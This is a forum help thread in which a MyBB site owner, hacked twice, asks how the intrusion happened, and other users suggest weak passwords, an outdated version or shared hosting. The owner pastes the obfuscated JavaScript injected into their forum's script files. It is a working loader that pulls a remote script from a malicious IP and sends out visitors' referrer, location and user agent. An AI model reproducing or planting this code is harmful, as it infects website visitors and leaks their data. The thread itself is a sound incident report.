MyBB Community Forums

My forum (1.6.5) has been hacked. It's the second time now. The first time I just wiped clean the directory and uploaded the new forum files.

My setup:
I'm actually running Drupal, and the forum is in Drupal directory.

It was detected on Windows XP, Firefox, Avast Antivirus, and here's the warning

URL:	http://91.196.216.64/s.php?ref
Process:	file://C:\Program Files\Mozilla Firefox\...
Infection:	url:Mal

I've been reading around and saw almost similar situation, e.g. http://community.mybb.com/thread-111147.html

Mine's

var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

All the 40 compromised files are javascript files, mainly located in the 'admin/jscripts' and 'jscripts' folders. Some Drupal files were affected as well.

I do not use any plugins and the forum is using the default installation settings. Permissions Reports didn't report anything suspicious.

How can I prevent this from happening again? I don't even know where the attack came from.

Did you used FBConnect by any chance?

(2012-01-11, 06:43 AM)crazy4cs Wrote: [ -> ]Did you used FBConnect by any chance?

I don't use any plugins.

Dumb Question: do you use very strong passwords?
At least one uppercase letter (pref more)
Multiple numbers
Multiple symbols
Not shared with another person at ALL
Length of at least 10 characters

I am just curious of it they managed to brute force your password for FTP or something.

(2012-01-11, 07:19 AM)GamerVoid Wrote: [ -> ]Dumb Question: do you use very strong passwords?
At least one uppercase letter (pref more)
Multiple numbers
Multiple symbols
Not shared with another person at ALL
Length of at least 10 characters

I am just curious of it they managed to brute force your password for FTP or something.

After the last hack a week ago, I changed my password to have upper/lower/number/punctuation

Is it a case of a brute force password hack?

Were you using MyBB 1.6.4 at any time?

If the same things happened twice, I'd be taking a look at my hosting provider to make sure it's not an intrusion at the server level.

Are you using shared host? Then your site might be in trouble.

(2012-01-11, 11:23 AM)jard0n5 Wrote: [ -> ]Are you using shared host? Then your site might be in trouble.

Depends on your hosting provider.

(2012-01-11, 11:08 AM)Pirata Nervo Wrote: [ -> ]Were you using MyBB 1.6.4 at any time?

I was using mybb 1.6.4 before. Can't remember if there was any intrusion during that time though.

---

(2012-01-11, 11:23 AM)jard0n5 Wrote: [ -> ]Are you using shared host? Then your site might be in trouble.

I'm using shared hosting from Bluehost.